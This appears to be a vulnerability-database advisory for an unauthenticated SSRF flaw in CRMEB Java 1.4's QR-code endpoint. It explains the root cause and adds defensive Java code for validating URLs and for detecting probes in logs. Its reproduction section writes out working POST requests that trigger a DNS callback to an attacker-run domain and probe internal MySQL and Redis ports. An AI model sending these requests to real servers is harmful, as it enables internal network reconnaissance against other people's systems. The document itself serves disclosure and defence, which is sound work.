VYPR
High severity (7.3) · NVD Advisory · Published Jun 3, 2026

CVE-2026-10771

Description

CRMEB Java 1.4 is vulnerable to SSRF via the base64 Qrcode Endpoint, allowing remote attackers to make arbitrary HTTP requests from the server.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

A Server-Side Request Forgery (SSRF) vulnerability exists in CRMEB Java version 1.4, in the RestTemplate.getForEntity() call made from RestTemplateUtil.java. The url parameter of the POST /api/front/qrcode/base64 endpoint is used without validation, allowing arbitrary HTTP requests to be made from the server.

Exploitation

An attacker can exploit this vulnerability remotely without authentication. By sending a POST request to the /api/front/qrcode/base64 endpoint with a crafted url parameter, an attacker can trick the server into making an HTTP request to an attacker-controlled domain or an internal network resource. The endpoint is not protected by the authentication interceptor [2].

Impact

Successful exploitation of this SSRF vulnerability allows an attacker to perform arbitrary HTTP requests from the server. This can lead to information disclosure by probing internal services, accessing sensitive internal resources, or potentially interacting with internal APIs, depending on the server's network configuration and accessible services [2].

Mitigation

CRMEB Java version 1.4 is affected. The project was informed of the issue via an issue report [2], but as of the publication date, no patch or fix has been released, and the project has not responded. There are no known workarounds. The project is still under active development as indicated by its GitHub repository [1].

AI Insight generated on Jun 3, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products (2)

  • Crmeb/Crmeb Java, 2 versions
    • (no CPE)
    • (no CPE) range: <1.4

Patches (0)

No patches discovered yet.

Vulnerability mechanics

Root cause

"The url parameter is directly passed to RestTemplate.getForEntity() without any validation, allowing attackers to make arbitrary HTTP requests from the server."

Attack vector

An attacker can send a POST request to the `/api/front/qrcode/base64` endpoint with a crafted URL. This endpoint is not protected by authentication, allowing unauthenticated access. The server then uses the provided URL in a call to `RestTemplate.getForEntity()`, enabling the attacker to perform server-side requests to arbitrary hosts or internal network resources [ref_id=1].

Affected code

The vulnerability resides in the `getBuffer` function within `crmeb-common/src/main/java/com/zbkj/common/utils/RestTemplateUtil.java`. This function directly uses the `url` parameter in `restTemplate.getForEntity(url, byte[].class).getBody()` without performing any validation. The entry point is the `get` function in `crmeb-front/src/main/java/com/zbkj/front/controller/QrCodeController.java`, which calls the vulnerable `base64` service method.

What the fix does

The advisory does not specify a patch or provide details on remediation. It indicates that the project was informed but has not responded. Therefore, no fix is currently available.
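Since no fix has been released, the following is an added illustration (not CRMEB's code and not a released patch) of how a getBuffer-style helper could validate the url parameter before handing it to RestTemplate.getForEntity(): http/https only, an allowlist of hosts the feature legitimately needs, standard ports only, every resolved address checked against loopback/private/link-local ranges, and HTTP redirects disabled so an allowed host cannot bounce the server inward. The class and method names (SafeRemoteFetch, isSafeUrl, fetchBytes) and the allowlist entry cdn.example.com are placeholders invented for the example.

```java
// Added example, not CRMEB's code: validate a caller-supplied URL before the
// server fetches it. Names and the allowlist entry are hypothetical.
import java.io.IOException;
import java.net.HttpURLConnection;
import java.net.InetAddress;
import java.net.URI;
import java.net.UnknownHostException;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;

import org.springframework.http.client.SimpleClientHttpRequestFactory;
import org.springframework.web.client.RestTemplate;

public final class SafeRemoteFetch {

    // Hosts the QR-code feature is allowed to fetch from (assumed value).
    private static final Set<String> ALLOWED_HOSTS =
            new HashSet<>(Arrays.asList("cdn.example.com"));

    // RestTemplate that does not follow 3xx responses, so an allowlisted host
    // cannot redirect the server to an internal address.
    private static final RestTemplate NO_REDIRECT_TEMPLATE = new RestTemplate(
            new SimpleClientHttpRequestFactory() {
                @Override
                protected void prepareConnection(HttpURLConnection connection, String httpMethod)
                        throws IOException {
                    super.prepareConnection(connection, httpMethod);
                    connection.setInstanceFollowRedirects(false);
                }
            });

    /** True only for http(s) URLs on an allowlisted host whose every resolved address is public. */
    public static boolean isSafeUrl(String raw) {
        final URI uri;
        try {
            uri = new URI(raw).normalize();
        } catch (Exception e) {
            return false;                                   // unparseable input
        }
        String scheme = uri.getScheme();
        if (scheme == null
                || !(scheme.equalsIgnoreCase("http") || scheme.equalsIgnoreCase("https"))) {
            return false;                                   // refuses file:, gopher:, dict:, ...
        }
        if (uri.getUserInfo() != null) {
            return false;                                   // refuses user@host forms
        }
        String host = uri.getHost();
        if (host == null || !ALLOWED_HOSTS.contains(host.toLowerCase())) {
            return false;                                   // host not on the allowlist
        }
        int port = uri.getPort();
        if (port != -1 && port != 80 && port != 443) {
            return false;                                   // no non-web ports such as 3306 or 6379
        }
        try {
            // Check every address the name resolves to, not just the first one.
            for (InetAddress addr : InetAddress.getAllByName(host)) {
                if (isInternal(addr)) {
                    return false;                           // allowlisted name resolving inward
                }
            }
        } catch (UnknownHostException e) {
            return false;
        }
        return true;
    }

    /** Loopback, private, link-local, multicast, IPv6 ULA and CGNAT ranges count as internal. */
    static boolean isInternal(InetAddress a) {
        if (a.isAnyLocalAddress() || a.isLoopbackAddress() || a.isLinkLocalAddress()
                || a.isSiteLocalAddress() || a.isMulticastAddress()) {
            return true;
        }
        byte[] b = a.getAddress();
        // isSiteLocalAddress() covers RFC 1918 and fec0::/10 but not these two ranges.
        if (b.length == 16 && (b[0] & 0xfe) == 0xfc) return true;                    // fc00::/7
        if (b.length == 4 && (b[0] & 0xff) == 100 && (b[1] & 0xc0) == 0x40) return true; // 100.64.0.0/10
        return false;
    }

    /** Hardened counterpart of a getBuffer-style helper: validate, then fetch without redirects. */
    public static byte[] fetchBytes(String url) {
        if (!isSafeUrl(url)) {
            // Generic message: do not echo the transport error, which would tell the
            // caller whether an internal host accepted the connection.
            throw new IllegalArgumentException("URL not permitted");
        }
        return NO_REDIRECT_TEMPLATE.getForEntity(url, byte[].class).getBody();
    }
}
```

Two caveats for anyone adapting this. The DNS check happens before the HTTP client performs its own resolution, so a name that changes answers between the two lookups (DNS rebinding) is not fully excluded; pinning the connection to the checked address, or routing outbound fetches through an egress proxy that enforces the same policy, closes that gap. The generic exception message matters as much as the allowlist: the reproduction responses on this page distinguish "connected" from "not connected" purely through the error text, and returning a constant message removes that oracle.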

Preconditions

  • auth: No authentication is required to access the vulnerable endpoint.
  • network: The attacker must have network access to the target server.

Reproduction

1. Verify SSRF via DNS callback

   POST /api/front/qrcode/base64 HTTP/1.1
   Host: <target>
   Content-Type: application/x-www-form-urlencoded

   url=http://<your-dnslog-domain>

   Check the DNS log for a callback from the server, confirming SSRF.

2. Internal network probing

   POST /api/front/qrcode/base64 HTTP/1.1
   Host: <target>
   Content-Type: application/x-www-form-urlencoded

   url=http://mysql:3306

   Response: {"code":500,"message":"I/O error on GET request for \"http://mysql:3306\": Invalid Http response"}

   POST /api/front/qrcode/base64 HTTP/1.1
   Host: <target>
   Content-Type: application/x-www-form-urlencoded

   url=http://redis:6379

   Response: {"code":500,"message":"I/O error on GET request for \"http://redis:6379\": Invalid Http response"}

   The error messages confirm that the server successfully connected to the internal MySQL and Redis services. [ref_id=1]
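The error strings quoted in the reproduction are also what a defender can hunt for. The following added example (not part of the advisory or of CRMEB) scans log lines for the RestTemplate "I/O error on GET request for ..." message and flags entries whose fetched destination looks internal: a loopback, private or link-local IP literal, a single-label hostname such as mysql or redis, or a non-web port. It assumes the application or a fronting proxy writes that message to a log; the sample lines are constructed, and the class name SsrfProbeDetector is invented. No DNS lookups are performed, so it can run offline over exported logs.

```java
// Added example, not the project's code: flag SSRF probing from the error
// messages the vulnerable endpoint produces. Sample log lines are constructed.
import java.net.InetAddress;
import java.net.URI;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public final class SsrfProbeDetector {

    // Matches the RestTemplate error text (quotes may appear JSON-escaped as \")
    // and captures the URL the server attempted to fetch.
    private static final Pattern IO_ERROR = Pattern.compile(
            "I/O error on GET request for \\\\?\"(https?://[^\"\\\\]+)\\\\?\"");

    public static final class Finding {
        public final String url;
        public final String reason;
        Finding(String url, String reason) { this.url = url; this.reason = reason; }
        @Override public String toString() {
            return "SSRF probe suspected: " + url + " (" + reason + ")";
        }
    }

    /** One finding per log line whose fetched URL points at an internal-looking destination. */
    public static List<Finding> scan(List<String> logLines) {
        List<Finding> findings = new ArrayList<>();
        for (String line : logLines) {
            Matcher m = IO_ERROR.matcher(line);
            if (!m.find()) continue;                      // not a fetch failure line
            String url = m.group(1);
            String reason = internalReason(url);
            if (reason != null) findings.add(new Finding(url, reason));
        }
        return findings;
    }

    /** Why the destination looks internal, or null if it does not. Literal IPs only; no DNS. */
    static String internalReason(String url) {
        URI uri;
        try { uri = new URI(url); } catch (Exception e) { return "unparseable URL"; }
        String host = uri.getHost();
        if (host == null) return "no host";
        if (host.matches("[0-9.]+") || host.startsWith("[")) {   // IPv4 or bracketed IPv6 literal
            try {
                InetAddress a = InetAddress.getByName(host.replace("[", "").replace("]", ""));
                if (a.isLoopbackAddress() || a.isSiteLocalAddress()
                        || a.isLinkLocalAddress() || a.isAnyLocalAddress()) {
                    return "private/loopback/link-local address";
                }
            } catch (Exception e) { return "bad address literal"; }
            return null;
        }
        // Single-label names only resolve inside the deployment network (mysql, redis, ...).
        if (!host.contains(".") || host.endsWith(".internal") || host.endsWith(".local")) {
            return "internal hostname";
        }
        int port = uri.getPort();
        if (port != -1 && port != 80 && port != 443) return "non-web port " + port;
        return null;
    }

    public static void main(String[] args) {
        // Constructed sample lines modelled on the responses in the reproduction section.
        List<String> sample = Arrays.asList(
            "2026-06-03 10:15:01 ERROR QrCodeController - I/O error on GET request for \"http://mysql:3306\": Invalid Http response",
            "2026-06-03 10:15:02 ERROR QrCodeController - I/O error on GET request for \"http://redis:6379\": Invalid Http response",
            "2026-06-03 10:15:03 ERROR QrCodeController - I/O error on GET request for \"http://169.254.169.254/latest/\": Connection refused",
            "2026-06-03 10:15:04 ERROR QrCodeController - I/O error on GET request for \"https://cdn.example.com/a.png\": Connection timed out",
            "2026-06-03 10:15:05 INFO  QrCodeController - qrcode generated");
        for (Finding f : scan(sample)) System.out.println(f);
        // The first three lines are flagged; the public CDN timeout and the INFO line are not.
    }
}
```

A burst of such findings from one client address, or any hit on a single-label service name, is a strong signal of the internal probing described above and worth correlating with the web server's access log for the same timestamps.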

Generated on Jun 3, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References (5)

News mentions (0)

No linked articles in our index yet.